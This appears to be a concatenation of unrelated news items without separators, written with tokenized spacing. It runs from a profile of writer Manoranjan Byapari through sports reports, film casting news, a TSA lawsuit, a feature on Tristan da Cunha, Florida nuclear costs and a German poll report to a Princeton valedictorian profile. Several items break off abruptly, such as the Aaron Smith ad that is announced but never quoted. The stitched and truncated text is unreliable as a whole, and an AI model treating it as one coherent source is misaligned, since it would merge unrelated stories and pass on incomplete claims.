For a man whose life is pockmarked with chilling stories of escaping multiple attempts on his life , fleeing the police , violence , destitution , imprisonment , political activism , the partition in the east , encounters with caste and class oppression , the account of his first meeting with Mahasweta Devi is wondrous . Sent to the Alipur Jail in Kolkata as an undertrial facing charges of attempted murder and rioting , a distraught Byapari started coveting the “ writer 's '' job among prisoners—maintaining daily records could help him evade rigorous labour . Being unlettered , he sought help from a fellow prisoner he affectionately refers to as Mastermoshai ( teacher ) . “ A young inmate told me that he had gone insane after reading a Sarat Chandra Chattopadhyay novel . I did n't know how to read or write and was perplexed . Soon , Mastermoshai started teaching me the first Bengali letters by drawing them on the floor . ''
Two years later , he got bail and took to rickshaw-pulling . To feed his mind , he began reading avidly . It was while ferrying a lady professor that the neo-literate , then in his late 20s , asked her the meaning of the Bengali word jijibisha ( the yearning for life ) . She was intrigued . Hearing of the rickshaw-puller 's interested in reading , she invited him to write for her Bengali journal , Bartika . In a city of multiple-million people , it was a sheer stroke of luck—the lady turned out to be Mahasweta Devi and Rickshaw Chalai ( I Pull A Rickshaw ) became Byapari 's first published piece of writing in 1981 . “ I slowly lost contact with her since I wanted to write fiction and Bartika accepted non-fiction from marginalized writers , '' says Byapari . Today , Byapari 's daughter , Mahasweta , named after the activist , is a constant reminder of the association that set him up as a writer .
The recently published collection of short stories , Golpo Somogro , feeds on the author 's experiences . As his many means of survival , Byapari 's author bio mentions that he was a goat- and cow-herd , teashop help , coolie , lorry helper , cremator of bodies , toilet cleaner , rickshaw puller and night guard—a representative map of the rural and subaltern underclass ' struggle in India .
Golpo Somogro begins with Swadhinota , a short story about a ration-shop coolie who , ironically , ca n't provide enough for his family . On a day of desperate hunger , he finds the ration shop closed , for it is India 's Independence Day . Uttoron is about a man who sells blood for money ( while in jail , Byapari would sell his for Rs20 to buy paper and pen ) . Golpo Holeo Sottyi is about a jail inmate looking for the prestigious position of “ writer '' , while Deenkal climaxes with the refusal of a hired assassin to carry out an assignment that could close down a night school for children , a reflection probably of the writer 's own thirst for knowledge . Possibly culled from Byapari 's experience of working as a security guard at a business establishment , Surjo Othar Mukhye introduces a factory guard of honest upbringing who becomes complicit in his employer 's cement-stealing racket . Unlike other guards before him , he earns nothing from the daily midnight theft , reasoning that he is now a chakor ( a servant to orders ) and not a chor ( thief ) . The story ends with a nuanced promise—the upcoming factory crashes down on a stormy night , severely injuring the guard at a time when his child is being born .
It is Narayan Seba which provides a stark throwback to his Dalit roots . Of zamindari-era vintage , two rich Brahmin landlords vie with each other to overfeed lower-caste villagers , their game premised on scoring the maximum number of deaths from the bingeing . Growing up , Byapari , a lower-caste animal herder , often faced ostracization at upper-caste homes . The author wears the Dalit-writer label lightly , seemingly more at ease with being the voice of the downtrodden , marginalized working class . “ Unlike other states , Dalits in Bengal are n't an untouchable community , '' he explains . “ But the class divide works against them . The political and economic power structure is also biased towards upper castes and none of the political parties have Dalit leaders at the very top . Dalits have to struggle constantly . ''
His next novel will be biographical fiction based on the 19th century Dalit Namasudra messiah of undivided Bengal , Harichand Thakur . Byapari says it is likely be his last novel . For the past one year , his salary has been withheld at a school for deaf and mute children in Kolkata where he would cook for Rs200 per day . The school administration , he alleges , is run by CPM workers who have been victimizing him since 2000—that is when the cover of pen names like Madan Dutta , Jijibisha and Arun Mitra , which he used to oppose the then Communist government 's policies on Singur and Nandigram , was blown . “ They realized that the enemy is within them . I 'm struggling to earn a living now and surviving on the patronage of a gentleman supporting me till my next novel comes out , '' says Byapari . “ Some people will donate and I will buy a toto to ferry passengers again . ''
The toto—battery-operated rickshaws that are ubiquitous in Bengal—will take him back to his rickshaw-pulling days , albeit in motorized fashion . The cotton gamcha ( towel ) that Byapari characteristically wears around his neck is something used often by rickshaw-pullers . “ I use it as a towel , a handkerchief and as a bedspread . There is also one other use , '' he says , pausing to look around for something solid . He finds his wallet and wraps the gamcha tightly around it till it becomes a sling .
Byapari 's expression contorts , the muscles around his temples flare and he bites his lips tersely while swinging the wallet-wrapped gamcha ferociously over our heads . “ Replace the wallet with a brick and my gamcha turns into a deadly weapon , '' he tells us as the whirring sling cuts through the humid air .
Suddenly , the writer Manoranjan Byapari becomes a character from his stories .
The Oakland Raiders Week 10 clash got off to a uick start as second year cornerback DJ Hayden made one of the biggest plays of his career with an interception on Peyton Manning to start the 0-8 Silver and Black 's first quarter on the right foot .
Hayden , who nearly had two interceptions on Russell Wilson in his first full game coming back from a offseason injury , tipped a Manning overthrow down the middle to himself before making an acrobatic catch that set Oakland up with good field position on their first offensive drive .
DJ HAYDEN . DJ HAYDEN . DJ HAYDEN . DJ * * * * * * * HAYDEN . — Just Blog Baby ( @ JustBlogBaby ) November 9 , 2014
DJ Hayden is good at cornerback . What do ya know . — Just Blog Baby ( @ JustBlogBaby ) November 9 , 2014
The Raiders settled for a field goal on the ensuing drive to go up 3-0 . Stay tuned to Just Blog Baby all afternoon as we provide up to the minute Raiders-Broncos coverage .
Warner Bros is getting its Peter Pan movie in ship-shape . It has just announced it has set Hugh Jackman to play Blackbeard in Pan , the Joe Wright-directed update of JM Barrie 's Peter Pan tale . He joins Garrett Hedlund , who we scooped this week landed the role of Captain Hook after being in the mix with Boardwalk Empire ‘ s Jack Huston and Perks Of Being A Wallflower ‘ s Ezra Miller . The script is by Jason Fuchs , and Greg Berlanti is producing under his Berlanti Productions banner with Paul Webster . Sarah Schechter is overseeing for the studio .
In Fuchs ' script , an orphan is taken to the magical world of Neverland , where he becomes the savior of the natives and leads a rebellion against the evil pirates led by Blackbeard . Javier Bardem at one time was offered this part , but Jackman was later rumored to be in the mix , and now it is final . For the record , that makes a pretty formidable acting duo playing the same historical figure : John Malkovich is set as Blackbeard in NBC 's upcoming pirate drama series Crossbones from Neil Cross .
The studio said today that the pic remains untitled , though it does have a July 17 , 2015 release date after it was shifted last week to take the slot previously held by the studio 's Superman Vs. Batman movie . The move keeps Pan from being sandwiched between Fox 's Fantastic Four and Paramount 's Terminator reboot and took the pic off the the same date as Ted 2 from Universal .
Jackman , repped by WME , just wrapped shooting on Fox 's X-Men : Days Of Future Past , and his most recent pic in theaters was the Warner Bros ' thriller Prisoners .
“ Hugh Jackman always delivers indelible performances that resonate with audiences , ” said Greg Silverman , Warners ' President , Creative Development and Worldwide Production , in announcing the deal . “ We know he will create a Blackbeard who will be a powerful presence in this original Peter Pan adventure. ” Added Sue Kroll , President , Worldwide Marketing and International Distribution : “ There is a reason that Hugh is known and loved the world over . He is uncompromising in his dedication to every role , and we are all thrilled to be working with him again . ”
If you were flying somewhere to spread your mother 's ashes , as per her requests , you 'd be upset if something happened to the ashes , right ? Well , an Ohio man is suing the TSA for spilling his mother 's ashes while searching through his suitcase .
Shannon Thomas filed suit after , he claims , not receiving any kind of response of apology from the TSA for the actions of its agents . Exactly two years ago this past Sunday , Thomas was flying from Cleveland to D.C. to Puerto Rico , where he would spread his mother 's ashes , as per her wishes .
Well , at the San Juan airport , he discovered a TSA bag-inspection notice on his bag , and when he opened it , the urn was ajar and his mother 's ashes were spilled over everything . The lawsuit claims Thomas “ suffered severe and persistent emotional distress and mental anguish , ” and is targeting the TSA for “ negligent infliction of emotional distress , ” among other things .
Thomas is claiming $ 750,000 in damages from the TSA .
[ image via Shutterstock ]
— —
Follow Josh Feldman on Twitter : @ feldmaniac
Have a tip we should know ? tips @ mediaite.com
Even though they lost this round , conservatives vow to continue their fight to dismantle Obamacare . And they point to major troubles with the rollout of the website where Americans without insurance can enroll in the new health care exchanges . [ ... ] According to the poll , just more than four in 10 say they favor the law , with 56 % opposed to it . But of those opposed , 38 % say they are against the law because they think it 's too liberal and 12 % say it 's not liberal enough . That means that 53 % either support Obamacare , or say it 's not liberal enough .
That CNN poll that demonstrates that yes , Republicans really did shoot themselves in the foot with their government shutdown and debt ceiling brinksmanship , also demonstrated , again , that Obamcare is n't so unpopular these days . Huh , about the same percentage ( 54 percent ) that say `` it 's a bad thing that the GOP controls the House . '' Seriously , Republicans , we 're done with this fight . The majority was n't with you on repeal : In March , 2011 , in May , 2011 ( and that 's a Rasmussen poll ! ) , in July , 2012 , in November , 2012 ( as if the election were n't indication enough ) , and finally July of this year .
Seriously , enough .
When a player gets released by a team -- especially one who has been with the organization for a long time -- it 's painful and can often lead to bitter feelings . That 's why gestures , like the one by former Steelers defensive end Aaron Smith , really stand out .
Smith , 35 , who had been with the Steelers for 13 years , bought a full-page ad in today 's Pittsburgh Post-Gazette to say goodbye to the organization and its fans . The last Steelers player to do this was Alan Faneca in 2008 , according to the Post-Gazette .
A 1999 fourth-round draft pick by the Steelers out of Northern Colorado , Smith was possibly the most unheralded figure on the Steelers ' defenses . From 2000 to 2008 , when Smith had double-digit starts , Pittsburgh ranked in the top 10 in defense all nine years including four as the top-ranked unit . During his career , Smith had at least four sacks in six seasons and is 10th on the team 's all-time list with 44 .
But injuries lessened his impact in recent years . Smith 's 2011 season ended in October when he was placed on injured reserve with a neck injury . It was the third straight season that injuries have limited Smith . He played in only 11 games spanning the 2009 and 2010 seasons because of shoulder and triceps injuries and appeared in just four in 2011 .
Here is what Smith wrote in the ad today :
Smack dab in the middle of the South Atlantic Ocean , 1,000 miles from human civilization , lies one of the most isolated towns in the world . It 's on an island called Tristan da Cunha , and for the first time , it 's looking to the outside world to plan its future .
It takes more than a week to get to The Settlement , as Tristan 's town is often called , by boat . When you do , you might not be able to land because the ocean swells are severe . There 's no airport . It 's a location so remote and unknown , it 's become almost mythical . To geologists , Tristan is the result of an eruption of a volcanic “ hotspot ” in the middle of the Atlantic . To historians , it 's a time capsule where the last remnants of colonial England remain . To Tristanites—or Trist'ns as some historians call them—it 's a community that preserves a way of life they 've chosen over the outside world .
Advertisement
But this month , Tristan is looking to the world far beyond its tiny boundaries for help . Working with The Royal Institute of British Architects , the local government is staging an open competition for a plan to bring the community into the 21st century and bolster its ability to sustain itself over the next few decades , using everything from architecture to energy and farming innovations . But to know why it 's asking for ideas , it helps to know a bit more about the island itself .
Utopia in the South Atlantic
About 300 people live on Tristan today—which is a lot , considering its population has dipped far below that throughout its 200 year history .
Advertisement
Brian Gratwicke
The community was officially established in the 1810s because it was “ close ” to St. Helena , the remote island where Napoleon was exiled , and the British thought France might use it to spring him from his prison . But Tristan is still more than 1,300 miles away from St. Helena , which would have made springing the Little Corporal out of his prison very difficult .
Advertisement
But when England abandoned its paranoia-induced outpost , a few men stayed behind , signing an agreement that designated their property and their labor shared . “ That document , now in the British Museum in London , embodies the communal , noncompetitive spirit that has characterized the culture of Tristan da Cunha ever since , ” writes Donald Theodore Sanders about the island in Volcanoes in Human History : The Far-Reaching Effects of Major Eruptions .
St. Helena marked in red , Tristan marked in green .
Thanks to a slow trickle of other settlers , Tristan slowly grew into its own tiny community , self-sufficient to the extreme . Without regular contact with the rest of the world , settlers had only themselves and the land to depend on for everything from produce to clothing to materials with which to build boats and homes .
Advertisement
Tristan existed with relative continuity until 1961 , when the volcano it sits on the edge of erupted—and the entire town was evacuated to England . Faced with the wonders of modern life , most of the world seemed to assume that the move would signal the end for Tristan . Who would go back to a rough , remote settlement after experiencing the comforts of contemporary technology and entertainment ?
Advertisement
Brian Gratwicke
It turned out that modern England had the exact opposite effect on Tristan 's community . If anything , life outside their volcano only reinforced their desire to return . It “ actually strengthened their group structure and consciousness and therefore placed diﬃculties in their expected adaptation , ” writes Óscar Álvarez-Gila about the Tristanites ' time in England .
So after those few years in England , most of the Tristan group returned to their tiny speck of ultra-remote land . In Crisis in Utopia , the sociologist Peter Andreas Munch sums up how bizarre the decision seemed to the rest of the world :
[ t ] he Tristan Islanders did indeed return to their own simple life before the very eyes of an amazed , dismayed , and somewhat insulted Western World ... It was as if our whole ethos and way of life had been put on trial , and had failed .
Advertisement
Terra Incognita
It sounds almost utopian . But while Tristanites prefer their way of life to any other , it 's still a struggle to survive on the island—and it 's getting harder . As its 200th anniversary approaches next year , the future of the island is in limbo , and the government is inviting designers from all over the world to think about its issues .
“ Tristan 's economy is however shrinking and the cost of living continues to rise , ” explains the competition organizers at RIBA . “ It is critical that cost-effective long-term solutions are found to improve the community , to make buildings energy efficient and reduce the living costs of the Island 's population . ”
Advertisement
Almost every aspect of life on Tristan is fair game . For example , the island 's economy depends mainly on fishing , and the current harbor only allows docking 60 days out of the year . A better one is desperately needed . Farming is another crucial issue , so it 's asking designers to consider contemporary ideas about improving soil quality and agriculture management . Water ( and drought ) is also a major problem , so the brief encourages entrants to design a more modern system for maintaining and recycling water .
Advertisement
Brian Gratwicke
And the houses and buildings are another issue—the current structures are decaying and inefficient , and they 're badly needed an overhaul . “ Construction of the houses is variable , but lack of insulation , lack of central heating , the maritime damp and mould are common complaints , ” explains organizers . Tristan also wants to kick its diesel habit , and is asking participants to help it reach a goal of using 40 percent renewable power within the next five years .
Even education is on the table , with designers asked to consider the infrastructure needed to bring vocational training programs to the island .
Advertisement
The Official CTBTO Photostream
Internet and Experts
More than 50 years ago , Tristan 's inhabitants had the chance to abandon their town and chose to return . And while it 's tempting to see the competition as asking the outside world for help after all these years , perhaps that 's not quite it .
Advertisement
While Tristan has spent hundreds of years surviving on its own , the information age is arriving . The internet came to Tristan in 1998 . In 2006 , it opened an internet cafe with several computers with 256 kbps connections . The town may never reach the speeds the rest of the world enjoys , for technical reasons : “ There are some places on earth–their locations are such that they are not in close proximity to fibre optic cables and they are not in close proximity to the footprints of satellites , ” as one expert told the Tristan Times in 2005 . “ Frankly there is little we can do other than recognize the fact that it is going to be expensive and for people who live in those locations to accept that it is expensive and it 's a way of life . ”
Maybe slow internet is n't such a huge problem . But it illustrates why the town might be interested in an international competition : The lack of experts in particular industries , like architecture and engineering , as many articles about the island have pointed out . When the internet arrived in 2006 Sarah Glass ( who shares a last name with William Glass , who settled Tristan in the 1800s ) wrote in the Times that “ Tristan has continued to prosper in the last 500 years since its discovery and there 's only one piece left to the puzzle , and that 's a ( safe operational ) new harbour . Consultants are due to visit in September for an assessment of the old harbour , so we continue to be optimistic . ”
It seems internet is an easier problem to solve than specialized knowledge—which may help explain why Tristan looking to the rest of the world for ideas about how it can use design to adapt . As RIBA says , the competition does n't guarantee that any of the designs will be implemented—after all , Tristan does n't have a budget or workforce for a massive overhaul . But what it will do is bring new ideas to an isolated community .
Advertisement
On the internet , good ideas are plentiful and almost suffocatingly common . It 's hard to imagine a place where a good idea about farming or water recycling or harbor design is n't just a smartphone button away .
In the end , Tristan and RIBA are staging a competition that 's unlike any other ever held . Here 's an island that is truly isolated , with only a few hundred inhabitants , that wants to rethink what a communal , sustainable , extraordinarily self-sufficient town looks like . Let 's hope designers and architects get excited about it , because what happens on Tristan over the next few years could become a blueprint for communities all over the world .
If you want to read more about Tristan , check out this account written by the wife of a clergyman who traveled to the island in the 1900s . Or head over to RIBA to learn more about the competition .
Progress Energy announced Tuesday that it had raised the price tag of a nuclear plant that may never get built , and said it wants customers to pay more for an existing reactor that may never restart .
The cost of the proposed Levy County nuclear plant could reach as high as $ 24 billion , up from the last estimate of $ 22.4 billion . And the utility said it would delay when the plant comes online from 2021 to 2024 — eight years after its original projected date of 2016 .
Progress ' 1.6 million Florida customers already are paying $ 1.1 billion toward the Levy project , though the utility has not made a final decision whether to build the plant . The U.S. Nuclear Regulatory Commission must first approve its license , a process that is not expected to be completed until sometime before 2014 . Progress says it will then decide whether to proceed with the project .
Critics of the Levy nuclear plant say Progress ' announcement signals that it is becoming more likely that the Levy project will never get built , even if the license is approved .
Susan Glickman of the Southern Alliance for Clean Energy , which opposes the Levy project and pushes for alternative energy , said someone needs to put an end to what appears to be an unbridled spending of customers ' money by Florida utilities .
`` We need a hall monitor to say this does n't make sense , '' Glickman said , `` whether it 's the speaker of the ( Florida ) House , the president of the Senate or the governor . ''
Progress announced the changes to the cost and schedule for the proposed Levy project in a statement Tuesday about its plans for nuclear power in Florida .
In addition to the changes to the Levy project , Progress wants the state to approve an increase in the amount it collects from its customers for its Crystal River nuclear plant , which has been offline since October 2009 .
During an upgrade and maintenance project , the 42-inch-thick concrete containment building cracked . The utility has struggled to repair its only existing nuclear plant in Florida ever since .
Progress wants the state Public Service Commission to approve $ 49 million for expenses related to attempting to increase the amount of power the Crystal River nuclear plant produces . None of that money is related to repairing the plant .
If approved , that $ 49 million would reduce the benefit of a $ 288 million refund Progress agreed to pay customers as part of a settlement over the broken Crystal River plant . The PSC 's staff expected such a request — only a bit higher .
It is still too early to know exactly what rates will be for next year . Based on Progress ' request , customers could see their bills increase from $ 123.19 per 1,000 kilowatts of usage to about $ 127.68 , subject to adjustments for fuel costs . That 's significantly more than what is charged by the two other major Florida utilities : Florida Power & Light , $ 94.62 per 1,000 kilowatt hours , and Tampa Electric at $ 106.90 .
Progress insists that it plans to bring the Crystal River nuclear plant back online and build the Levy project , despite critics who say completing either project is becoming increasingly unlikely because of cost and the burden they are placing on customers to pay for it all .
For example , early estimates in 2006 indicated the Levy project would cost $ 4 billion to $ 6 billion with start-up in 2016 . The cost changed in 2007 to $ 10 billion and in 2008 to $ 17 billion . In 2011 it reached $ 22.4 billion with start-up in 2021 .
Now it 's up to $ 24 billion with it going online in 2024 for the first of the two reactors and the second 18 months later .
`` Nuclear power remains a key component of Progress Energy 's balanced solution strategy to meet our customers ' future energy needs with efficient , carbon-free electricity , '' Vincent Dolan , president and chief executive officer of Progress Energy Florida , said in Tuesday 's announcement .
The PSC is expected to review Progress ' filing during its annual Nuclear Cost Recovery Clause in August .
Charles Rehwinkel , deputy state public counsel , who represents consumers before the PSC , said efforts to stop charges related to the Levy project have been rebuffed by the commissioners . Rehwinkel argued to the PSC last summer that the plant would not come online until well after 2021 , but commissioners ignored him .
The requested Crystal River charges , Rehwinkel said , are more difficult to counter because state law allows Progress to recover such expenses .
`` The costs that Progress is including for ( Crystal River ) are costs the statute appears to authorize , '' Rehwinkel said . `` On one hand , though , it appears that customers are being asked to pay for a plant that 's not running . ''
Arnie Gundersen , a nuclear engineer who testifies before state public service commissions about nuclear plants , said Progress ' plan makes `` no economic sense . ''
`` The amount is so freaking huge that having a license really is n't going to matter , '' Gundersen said . `` It 's breathtaking . ''
Ivan Penn can be reached at [ email protected ] or ( 727 ) 892-2332 .
Chairwoman of the anti-immigration party Alternative for Germany ( AfD ) Frauke Petry reacts during the second day of the AfD party congress in Stuttgart , Germany , May 1 , 2016 . REUTERS/Wolfgang Rattay
Berlin ( Reuters ) - Die rechtspopulistische AfD legt auch nach ihrem Bundesparteitag laut einer Umfrage weiter zu , während Union und SPD auf neue Tiefpunkte fallen .
Im ARD-Deutschlandtrend vom Donnerstag gewinnt die AfD nach Mitteilung des WDR einen Punkt auf 15 Prozent . Die Union unter Kanzlerin Angela Merkel ( CDU ) verliert einen Punkt auf 33 Prozent . Das sei der tiefste Wert für die Union im ARD-Deutschlandtrend seit Oktober 2011 . Ein neues Tief markieren auch die Sozialdemokraten und ihr Parteichef Sigmar Gabriel : Wenn am Sonntag Bundestagswahl wäre , erhielte die SPD 20 Prozent . Das sei die geringste Zustimmung , die im seit 1997 bestehenden Deutschlandtrend je für sie gemessen worden sei .
Auch in den persönlichen Werten geht es für Gabriel bergab . Mit 38 Prozent Zustimmung erreicht der Anwärter auf die SPD-Kanzlerkandidatur 2017 den WDR-Angaben zufolge den schlechtesten Wert in dieser Wahlperiode . Angeführt wird die Liste der beliebtesten Politiker von Außenminister Frank-Walter Steinmeier ( SPD ) mit 70 Prozent Zustimmung , gefolgt von Finanzminister Wolfgang Schäuble ( CDU , 60 Prozent ) und Merkel ( 55 Prozent ) .
Im Bundestag hätte demnach außer der großen Koalition aus Unionsparteien und SPD kein anderes Zweier-Bündnis eine Mehrheit . Die Grünen kämen der Umfrage zufolge unverändert auf 13 Prozent , während die nicht im Bundestag vertretene FDP einen Punkt auf sechs Prozent verliert . In dem Sieben-Parteien-Parlament erzielte die Linke acht Prozent .
Für die Sonntagsfrage befragte das Meinungsforschungsinstitut Infratest dimap von Montag bis Dienstag dieser Woche bundesweit 1503 Wahlberechtigte .
1st 2nd 3rd F Minnesota 1 1 3 5 Penn State 0 0 2 2 5 Box Score 2
Scoring Summary First Period Team Time Scorer Assist MINN 2:25 Boyd ( 6 ) PPG Fasching , M. Reilly Second Period Team Time Scorer Assist MINN 17:15 Warning ( 6 ) Kloos , Marshall Third Period Team Time Scorer Assist MINN 6:06 Warning ( 7 ) Brodzinski , Kloos PSU 10:01 Brooks ( 2 ) Glen , Loik MINN 10:18 Condon ( 3 ) Warning , Marshall PSU 16:30 Loik ( 3 ) Juha MINN 19:56 Kloos ( 8 ) ENG Boyd , Condon Goalies GA SVS Wilcox ( MINN ) 2 36 McAdam ( PSU ) 4 20 Team Statistics MINN PSU Shots on Goal 25 38 Power Play 1-5 0-3 Penalties 4-8 6-12 Gopher Hockey Online Â• Hockey Home | Hockey Blog
Â• Twitter : @ GopherHockey
Â• Gophers on Facebook
Jan. 13 , 2014
Final Stats
UNIVERSITY PARK , Pa. - The top-ranked Minnesota men 's hockey team padded its lead atop the Big Ten standings by downing Penn State , 5-2 , at Pegula Ice Arena in University Park , Pa. Monday night . Sam Warning snapped a 14-game goalless drought with a pair of goals to guide the Gophers to a series sweep in the first-ever conference series at the new PSU hockey facility .
With the victory , Minnesota moved to 5-0-1-0 in league play and now sits four points ahead of second-place Wisconsin . The 15-3-2 overall record the program 's third-best through 20 games .
Junior Travis Boyd got the visitors on the board first just 2:25 into the game on the power play , zipping a shot over the left shoulder of Nittany Lion goaltender Eamon McAdam .
PSU emerged from the first period with a 12-9 lead in shots , but Gopher netminder Adam Wilcox backstopped his team to a one-goal lead through 20 minutes .
In the second period , Warning potted his first goal of the night to give Minnesota some insurance . On the tail end of an odd-man rush with Justin Kloos and Ben Marshall , the Chesterfield , Mo . native blasted a one-timer from the right faceoff dot upstairs past McAdam .
Warning struck again the third stanza , backhanding home a Michael Brodzinski rebound to make it a 3-0 game with 13:54 to play .
Penn State answered and ended Wilcox 's shutout bid just past the midway point in the third when Kenny Brooks jammed home a puck from the side of the goalmouth , but senior Nate Condon responded for the Gophers just 17 seconds later with his first goal since Oct. 27 .
Curtis Loik trimmed the Minnesota lead to 4-2 with under five minutes left , but the Nittany Lions could not solve Wilcox again . Kloos capped the scoring by capitalizing on an empty PSU net in the game 's waning moments .
Wilcox matched a career high by recording 36 saves . Warning and Kloos finished the game with three points apiece , while Marshall , Boyd , and Condon notched two points each .
The Gophers resume conference action Friday night at 8 p.m. when they host another conference foe , Ohio State , in the Hockey City Classic at TCF Bank Stadium . The series with the Buckeyes wraps up Saturday evening at 5 at Mariucci Arena .
-Pride on Ice-
Jin Yun Chow knew when she came to Princeton it was time to step outside her comfort zone .
Starting with the decision to attend college halfway around the world from her native Hong Kong , her journey at Princeton has been shaped by purposeful choices that have taken her into unfamiliar spaces to feed her curiosity about the world .
She has mastered new languages ; stepped onto the stage to act for the first time — in French ; passed through the doors of prisons to tutor inmates ; dived into 19th-century archives to research an underappreciated female translator ; and forged deep friendships with people from very different backgrounds .
Her studies in Latin , German and Old Irish , as well as literature classes in Chinese and French , have taken the Princeton senior to the top of her class . A comparative literature major , Chow is the valedictorian of the Class of 2017 . She will deliver an address at the University 's Commencement ceremony on June 6 .
At Princeton , Chow 's passion for language deepened through intensive study — and unexpected coincidence . Last fall , she stumbled on a connection between Old Irish ( spoken between the seventh and ninth centuries ) and Cantonese in a linguistics course taught by Joshua Katz , the Cotsen Professor in the Humanities and professor of classics . She took the course after having taken Katz 's `` Imagined Languages '' class — a roller coaster ride through `` Star Trek 's '' Klingon and more .
`` One day we were discussing the Old Irish word for mead ( a drink made from fermented honey ) , which is 'mid , ' '' she said . A classmate who is Australian and speaks Cantonese pointed out that `` mid '' was related to the Tocharian word — spoken in very old northwestern China — for honey , `` mit . '' Chow noted that in Cantonese , which preserves the oldest pronunciations of Chinese , the usual transliteration of the word for honey is `` mat . ''
`` That one word 's journey — from Proto-Indo-European to the geographically distant languages Old Irish and Tocharian and from there into northwestern China and then Cantonese , which is spoken in southeastern China — was just so cool , '' Chow said . `` It confirmed that there are moments in esoteric academic study that are n't so 'ivory-tower-esque . ' If you 're open-minded enough you can make all these connections with everything else in your life experience . ''
A member of Mathey College , Chow was awarded the Shapiro Prize for Academic Excellence her freshman and sophomore years . She was elected to Phi Beta Kappa in fall 2016 .
After graduating , Chow will pursue a Ph.D. in comparative literature at Stanford University , where she plans to study digital humanities and European-Chinese literary relations . She also will start learning Arabic . `` There 's so much to be gained culturally and emotionally from languages and dialects , '' she said .
First , this summer , Chow will return to Hong Kong . She plans to design a humanities curriculum for an education center as well as teach at a summer camp that helps Mainland-Chinese immigrant children adapt to the local school environment .
Chow chats with Anna Shields , a professor of East Asian studies and co-adviser on Chow 's senior thesis , which explores `` Le livre du jade '' ( `` The Book of Jade '' ) , one of the first 19th-century French translations of seventh- and eighth-century classical Chinese poems .
Found in translation : A heroine of her own
Chow 's senior thesis explores `` Le livre du jade '' ( `` The Book of Jade '' ) , one of the first 19th-century French translations of seventh- and eighth-century classical Chinese poems . The translator , Judith Gautier , was one of the first female translators of Chinese poetry into French , Chow said . `` That book caused a little earthquake in the French poetic scene because her father , Théophile Gautier , was one of the most famous French poets of the 19th century — and she was best friends with Baudelaire , a rumored mistress of Victor Hugo , and she had a fling with Wagner . ''
Chow said Gautier was overshadowed by the male translators of the time and her work was criticized for being riddled with errors and not academic . `` My thesis tries to clear her name , '' she said . `` I argue that she 's a poet and not only a translator . She wanted to do a popular translation of Chinese literature so people would have fun with it . She may not have had the Chinese level that 's required to do an accurate translation , but she 's done so much to bring Chinese literature into the French consciousness . ''
`` I do n't know of any other student who has worked with me over my 50 years in the profession who could have carried out the delicate task she set herself with such good results , '' said Peter Brooks , a lecturer with the rank of professor in comparative literature and the University Center for Human Values , who served as co-adviser on Chow 's thesis .
`` This was a scholarly adventure of the best possible sort , and as adviser I observed and participated with delight , '' said Brooks , who also advised Chow on her junior paper on the French novelist Nathalie Sarraute .
Anna Shields , a professor of East Asian studies , was a co-adviser on Chow 's senior thesis . `` It was astonishing to see her agile mind at work on truly complex issues of translation and poetics , '' Shields said . `` I think her thesis is easily publishable in some form . On top of that , she is just a wonderful person — thoughtful , compassionate and enthusiastic about everything — and that will make her a terrific teacher and scholar . ''
Chow and other volunteers with the Princeton Employment Reentry Program ( PREP ) — a prison teaching initiative that Chow helped start — catch up outside Frist Campus Center while waiting for the bus to take them to one of the correctional facilities where the program is offered . The volunteers hold workshops and one-on-one coaching in the job application procedure , including resume and cover letter writing and interview training .
Act two : Stepping into new territory
Chow 's pursuits beyond the classroom speak to her range of interests .
Chow had never acted before coming to Princeton , but in her first year she joined the student French theater troupe L'Avant-Scène , directed by Florent Masse , lecturer in French and Italian .
`` I wanted to learn how to enunciate [ French ] in a way I would n't have been able to do just in class , '' she said . `` Having to [ act ] in a language I 'm not comfortable with was the best thing I could do for my French . ''
After reading an article a Princeton friend wrote in a Hong Kong newspaper about his experience volunteering in a New Jersey prison with the Petey Greene Program , Chow was drawn to volunteer as well . She said she wanted to learn about America through a different lens . `` It 's so easy to be blind . ''
Her volunteer work inspired Chow to start Princeton Employment Reentry Program ( PREP ) with three friends . Students of PREP learn about the job application procedure , including resume and cover letter writing and interview training . The program now includes 20 Princeton student volunteers who teach at four correctional facilities .
`` Coming to Princeton was a social-political awakening for me about the realities of life in the United States — discrimination , race , things that had never crossed my mind ... despite having heard nothing but politics around the dinner table as a child , '' said Chow , whose mother is a civil servant in the Hong Kong government . `` I came here and got interested in American politics , which now makes me want to go back and learn more about where I come from . ''
Even Chow 's friendships have opened new spaces — `` everyone in my school [ growing up ] was Chinese '' — as she 's met people at Princeton from a wide variety of backgrounds and countries . Other friendships have crossed generational lines . After taking the course `` Children in the Holocaust '' taught by Froma Zeitlin , the Ewing Professor of Greek Language and Literature , Emeritus , and professor of classics and comparative literature , emeritus , she and Zeitlin became fast friends . `` She 's like my god-grandmother , '' Chow said .
`` Jin is simply one of the best students I have ever taught at Princeton , '' said Zeitlin , who joined the University in 1976 . `` Perceptive , engaged , intellectually curious and willing to take academic risks are a few of her most defining characteristics . Combine these traits with a delightful modesty , an infectious sense of humor , and an ability to make and keep friends . All her work in my course was off the scale in depth of analysis , linguistic sensitivity and original expression . Jin certainly exemplifies the wisdom of Princeton 's determination to recruit international students , such as she , with different backgrounds , languages and life experiences . ''
Chow takes the stage in a 2014 production of Georges Feydeau 's farce `` Le Dindon , '' presented by the student French theater troupe L'Avant-Scène . From left : Naomi Lake , Chow , and Constantin Weickart , members of the Class of 2017 ; and Cole Freeman and Remi Yamazaki , members of the Class of 2014 .
Be here now : Learning 'the best things happen unplanned '
Chow said her favorite experience during her four years at Princeton happened this spring at 2D , the student vegetarian co-op . It 's `` an amazing , diverse community of international and American students , '' she said .
`` I 'm very disciplined and uptight with my time — something I 'm actively trying to change , '' Chow explained . `` I do n't just hang out spontaneously . But this day , after dinner , a group of us , about six women , had a really open conversation about things that are taboo : body image , eating disorders , intimacy problems . That was really eye-opening for me because I come from a very conservative background , as in we do n't talk about things that we 're not supposed to talk about . ''
But the true highlight came later in the evening , when the group stepped out into the clear night , the sky awash in twinkling stars . `` There was a graduate student in astrophysics sitting on the lawn , '' Chow said . `` He taught us how to distinguish between a planet and a star . You could see Jupiter right next to the moon , because the sun was lighting them both up . We used an app that tells you where the constellations are . It makes you feel small and unimportant in a really liberating way . The best things happen unplanned . ''
Even what Chow calls her `` worst experience at Princeton '' had a positive outcome . In her second week on campus her lung collapsed due to a rare condition . It had happened twice before she came to Princeton . Chow had emergency surgery and spent a week in the hospital . Shaken , alone and very far away from home , she had a lot of time to think .
